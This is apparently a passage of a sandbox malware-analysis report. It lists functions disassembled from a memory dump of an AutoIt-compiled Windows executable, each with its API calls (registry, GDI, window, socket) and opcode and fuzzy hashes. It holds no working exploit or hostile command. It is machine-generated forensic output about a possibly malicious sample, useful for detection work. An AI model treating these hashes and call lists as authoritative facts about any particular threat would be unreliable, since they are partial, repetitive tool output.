          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ConnectRegistry_memmove_wcslen
          • String ID:
          • API String ID: 15295421-0
          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
          APIs
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • _wcstok.LIBCMT ref: 004675B2
            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
          • _wcscpy.LIBCMT ref: 00467641
          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
          • _wcslen.LIBCMT ref: 00467793
          • _wcslen.LIBCMT ref: 004677BD
            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
          • String ID: X
          • API String ID: 780548581-3081909835
          • Opcode ID: 5378e8049ee2a95257be1467db38ea41a0f606468867fb51d90dd075906198f3
          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
          • Opcode Fuzzy Hash: 5378e8049ee2a95257be1467db38ea41a0f606468867fb51d90dd075906198f3
          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
          APIs
            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
          • CloseFigure.GDI32(?), ref: 0044751F
          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
          • String ID:
          • API String ID: 4082120231-0
          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
          APIs
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
          • RegOpenKeyExW.ADVAPI32 ref: 0046B3D2
          • RegCloseKey.ADVAPI32(?), ref: 0046B3FD
          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
          • RegCloseKey.ADVAPI32(?), ref: 0046B459
          • RegCloseKey.ADVAPI32(?), ref: 0046B492
          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
          • String ID:
          • API String ID: 2027346449-0
          • Opcode ID: f05aa9c125d956be5cb37f8e3174f352fb3efd778f2f56ffbf0a9061f5576164
          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
          • Opcode Fuzzy Hash: f05aa9c125d956be5cb37f8e3174f352fb3efd778f2f56ffbf0a9061f5576164
          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
          APIs
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
          • GetMenu.USER32 ref: 0047A703
          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
          • _wcslen.LIBCMT ref: 0047A79E
          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
          • GetSubMenu.USER32 ref: 0047A7F2
          • PostMessageW.USER32 ref: 0047A884
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
          • String ID:
          • API String ID: 3257027151-0
          • Opcode ID: 55eecc74988516d85c88a22280f9c02fc81f53769963e1aaaaa9d8c7f4df8b48
          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
          • Opcode Fuzzy Hash: 55eecc74988516d85c88a22280f9c02fc81f53769963e1aaaaa9d8c7f4df8b48
          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
          APIs
          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorLastselect
          • String ID:
          • API String ID: 215497628-0
          • Opcode ID: ec9fecd080e153ee0de7faa395078def30027a4acec08f42019fdcf713b93aab
          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
          • Opcode Fuzzy Hash: ec9fecd080e153ee0de7faa395078def30027a4acec08f42019fdcf713b93aab
          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessagePost$KeyboardState$Parent
          • String ID:
          • API String ID: 87235514-0
          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessagePost$KeyboardState$Parent
          • String ID:
          • API String ID: 87235514-0
          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __snwprintf__wcsicoll_wcscpy
          • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
          • API String ID: 1729044348-3025626884
          • Opcode ID: d7b4579b561b30e0ba46cefe96ebdef8ce93d2152717f69a91d62fb0f3626d4f
          • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
          • Opcode Fuzzy Hash: d7b4579b561b30e0ba46cefe96ebdef8ce93d2152717f69a91d62fb0f3626d4f
          • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
          APIs
          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
          • DeleteObject.GDI32(?), ref: 00455736
          • DeleteObject.GDI32(?), ref: 00455744
          • DestroyIcon.USER32(?), ref: 00455752
          • DestroyWindow.USER32 ref: 00455760
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
          • String ID:
          • API String ID: 2354583917-0
          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
          APIs
          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
          • EnableWindow.USER32(?,00000000), ref: 00448B5C
          • EnableWindow.USER32(?,00000001), ref: 00448B72
          • ShowWindow.USER32(?,00000000), ref: 00448BE8
          • ShowWindow.USER32(?,00000004), ref: 00448BF4
          • EnableWindow.USER32(?,00000001), ref: 00448C09
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Enable$Show$MessageMoveSend
          • String ID:
          • API String ID: 896007046-0
          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
          APIs
          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
          • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
          • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
          • SendMessageW.USER32(024CDD58,000000F1,00000000,00000000), ref: 00440E6E
          • SendMessageW.USER32(024CDD58,000000F1,00000001,00000000), ref: 00440E9A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$LongWindow
          • String ID:
          • API String ID: 312131281-0
          • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
          • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
          • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
          • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
          APIs
          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
          • GetFocus.USER32 ref: 00448ACF
          • EnableWindow.USER32(?,00000000), ref: 00448B5C
          • EnableWindow.USER32(?,00000001), ref: 00448B72
          • ShowWindow.USER32(?,00000000), ref: 00448BE8
          • ShowWindow.USER32(?,00000004), ref: 00448BF4
          • EnableWindow.USER32(?,00000001), ref: 00448C09
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Enable$Show$FocusMessageSend
          • String ID:
          • API String ID: 3429747543-0
          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
          • GetVolumeInformationW.KERNEL32 ref: 0045D4CF
          • __swprintf.LIBCMT ref: 0045D4E9
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$InformationVolume__swprintf
          • String ID: %lu$\VH
          • API String ID: 3164766367-2432546070
          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
          APIs
          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend
          • String ID: Msctls_Progress32
          • API String ID: 3850602802-3636473452
          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
